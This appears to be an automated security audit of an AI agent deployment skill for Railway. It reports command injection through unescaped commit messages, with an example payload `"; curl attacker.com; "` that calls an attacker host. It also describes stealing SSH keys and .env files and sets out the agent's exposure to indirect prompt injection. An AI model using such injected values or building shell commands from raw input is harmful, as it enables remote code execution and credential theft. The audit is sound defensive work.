deploy
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH (COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION)
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill constructs shell commands by interpolating user-provided commit messages directly into the `-m` flag of the `railway up` command. A malicious user could provide a message containing shell metacharacters (e.g., `"; curl attacker.com; "`) to break out of the intended command and execute arbitrary code.
  - Evidence: `SKILL.md` contains the pattern `railway up --detach -m "[USER_MESSAGE]"`.
- [DATA_EXFILTRATION] (HIGH): In conjunction with the command injection vulnerability, an attacker can execute commands to read and transmit sensitive files (like `~/.ssh/id_rsa` or `.env` files) to an external server.
- [PROMPT_INJECTION] (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8) due to its handling of untrusted user data.
  - Ingestion points: User-provided commit messages (`-m`) and service names in `SKILL.md` and `references/environment-config.md`.
  - Boundary markers: Absent. The instructions do not define delimiters or provide warnings to the agent about treating user input as untrusted.
  - Capability inventory: Access to the `Bash` tool with `railway:*` permissions, which can modify cloud infrastructure and access local files.
  - Sanitization: Absent. There are no instructions for the agent to escape shell characters or validate the structure of the user-provided message.
Recommendations
- AI detected serious security threats
Audit Metadata